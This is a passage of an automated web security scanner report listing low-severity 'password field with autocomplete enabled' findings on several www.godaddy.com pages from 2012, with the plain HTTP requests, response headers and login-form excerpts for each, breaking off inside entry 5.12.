5. Password field with autocomplete enabled  previous  next
There are 91 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. http://www.godaddy.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=qwaogadtvv45rck5ni3xg0ow; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=qwaogadtvv45rck5ni3xg0ow; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=20; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:31:51 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:31:51 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:31:51 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:31:51 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=20; domain=godaddy.com; path=/
Set-Cookie: HPBackground=Danica1; path=/
Set-Cookie: HPBackground=Danica1; path=/
Set-Cookie: GoogleADServicesgoogleadwordshome=tfdaqdvjzcrejjidhffemfqgcdtcojqc; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:31:51 GMT; path=/
Date: Mon, 05 Mar 2012 01:31:51 GMT
Content-Length: 194933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.2. http://www.godaddy.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?isc=GPPT02C001&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=tp0kutaudoh3nisanzc0h1ey; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=tp0kutaudoh3nisanzc0h1ey; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=7; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:06 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:06 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:06 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:06 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/&server=M1PWCORPWEB137&status=200 OK&querystring=isc=GPPT02C001&domain=edhardy.com&shopper=&privatelabelid=1&isc=GPPT02C001&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=7; domain=godaddy.com; path=/
Set-Cookie: HPBackground=Danica1; path=/
Set-Cookie: HPBackground=Danica1; path=/
Set-Cookie: GoogleADServicesgoogleadwordshome=kjpdacrffapgcitiharfnhqgaibbifqf; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:06 GMT; path=/
Date: Mon, 05 Mar 2012 01:40:05 GMT
Connection: close
Content-Length: 198159


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPPT02C001&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.3. http://www.godaddy.com/Business/business-hosting.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Business/business-hosting.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Business/business-hosting.aspx?isc=gppt02C018&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vpmstde2e25a1x2efpbpfvpm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vpmstde2e25a1x2efpbpfvpm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:17 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:17 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:17 GMT; path=/
Set-Cookie: SplitValue1=21; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:17 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Business/business-hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=gppt02C018&domain=edhardy.com&shopper=&privatelabelid=1&isc=gppt02C018&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=21; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:16 GMT
Connection: close
Content-Length: 189896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gppt02C018&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.4. http://www.godaddy.com/Business/business-hosting.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Business/business-hosting.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Business/business-hosting.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=4fj5243rjfbercuviruegzp0; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=4fj5243rjfbercuviruegzp0; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:15 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:15 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:15 GMT; path=/
Set-Cookie: SplitValue1=64; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:15 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Business/business-hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=64; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:16 GMT
Connection: close
Content-Length: 186689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.5. http://www.godaddy.com/NewsCenter/about-godaddy.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /NewsCenter/about-godaddy.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /NewsCenter/about-godaddy.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=tfpyojrpp2aswlk1w3btjzro; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=tfpyojrpp2aswlk1w3btjzro; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:14 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:14 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:14 GMT; path=/
Set-Cookie: SplitValue1=2; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:14 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/NewsCenter/about-godaddy.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=2; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:14 GMT
Connection: close
Content-Length: 94867


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.6. http://www.godaddy.com/NewsCenter/marketing-opportunities.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /NewsCenter/marketing-opportunities.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /NewsCenter/marketing-opportunities.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=axt1cxnzdypurvqrarueieex; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=axt1cxnzdypurvqrarueieex; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:22 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:22 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:22 GMT; path=/
Set-Cookie: SplitValue1=23; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:22 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/NewsCenter/marketing-opportunities.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=23; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:21 GMT
Connection: close
Content-Length: 88744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.7. http://www.godaddy.com/NewsCenter/releases.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /NewsCenter/releases.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /NewsCenter/releases.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eoe5a1c4g34srrwmnq3gbqy0; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=eoe5a1c4g34srrwmnq3gbqy0; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:19 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:19 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:19 GMT; path=/
Set-Cookie: SplitValue1=67; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:19 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/NewsCenter/releases.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=67; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:18 GMT
Connection: close
Content-Length: 135364


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.8. http://www.godaddy.com/NewsCenter/testimonials.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /NewsCenter/testimonials.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /NewsCenter/testimonials.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vzazjvk2gwsx32uoj0h5adhi; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vzazjvk2gwsx32uoj0h5adhi; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:24 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:24 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:24 GMT; path=/
Set-Cookie: SplitValue1=26; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:24 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/NewsCenter/testimonials.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=26; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:24 GMT
Connection: close
Content-Length: 89490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.9. http://www.godaddy.com/Payment/payment-options.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Payment/payment-options.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Payment/payment-options.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=r41napfqnh45r24axwbq2fqg; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=r41napfqnh45r24axwbq2fqg; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:50 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:50 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:50 GMT; path=/
Set-Cookie: SplitValue1=69; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:50 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=69; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:50 GMT
Connection: close
Content-Length: 104110


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.10. http://www.godaddy.com/SocialMedia/social-media.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /SocialMedia/social-media.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /SocialMedia/social-media.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=r5m5fjxayzwsqbitmkaqufdz; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=r5m5fjxayzwsqbitmkaqufdz; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:01 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:01 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:01 GMT; path=/
Set-Cookie: SplitValue1=87; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:01 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/SocialMedia/social-media.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=87; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:01 GMT
Connection: close
Content-Length: 88781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.11. http://www.godaddy.com/affiliates/affiliate-program.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /affiliates/affiliate-program.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /affiliates/affiliate-program.aspx?isc=GPPT03C012&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=jqlqdrtvt4e5wlx2fmv3ijck; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=jqlqdrtvt4e5wlx2fmv3ijck; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:53 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:53 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:53 GMT; path=/
Set-Cookie: SplitValue1=59; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:53 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=GPPT03C012&domain=edhardy.com&shopper=&privatelabelid=1&isc=GPPT03C012&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=59; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:53 GMT
Connection: close
Content-Length: 133132


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPPT03C012&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.12. http://www.godaddy.com/affiliates/affiliate-program.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /affiliates/affiliate-program.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /affiliates/affiliate-program.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
